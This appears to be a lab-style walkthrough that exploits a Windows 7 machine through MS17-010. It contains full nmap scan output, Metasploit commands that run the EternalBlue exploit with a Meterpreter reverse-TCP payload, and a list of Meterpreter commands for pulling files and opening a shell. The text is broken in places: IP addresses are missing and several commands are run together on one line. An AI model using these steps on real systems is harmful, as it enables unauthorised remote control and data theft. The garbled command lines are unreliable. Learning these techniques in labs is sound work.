Phase 1: Recon

Phase 2: Scanning

nmap -A -T4
Nmap scan report for
Host is up (0.075s latency).
Not shown: 65526 closed ports
microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -18m05s, deviation: 34m36s, median: 1m52s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-05-08T23:05:29+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-08T22:05:28
|_ start_date: 2020-05-08T22:02:01
TRACEROUTE (using port 993/tcp)
1 75.10 ms
2 75.33 ms

Phase 3: Exploitation

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost auxiliary(scanner/smb/smb_ms17_010) > run[+]       - Host is likely VULNERABLE to MS17-010! - 
[*] - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost exploit(windows/smb/ms17_010_eternalblue) > exploit

Phase 4: Gaining Access/Maintaining access

cd   - Change directorydownload - Download a file or directoryupload - Upload a file or directorygetuid  - Get the user that the server is running assysinfo - Gets information about the remote system, such as OSshell - Drop into a system command shell

Phase 5: Covering tracks

meterpreter > exit
[*] Shutting down Meterpreter...
[*] - Meterpreter session 2 closed. Reason: User exit
msf5 exploit(windows/smb/ms17_010_eternalblue) >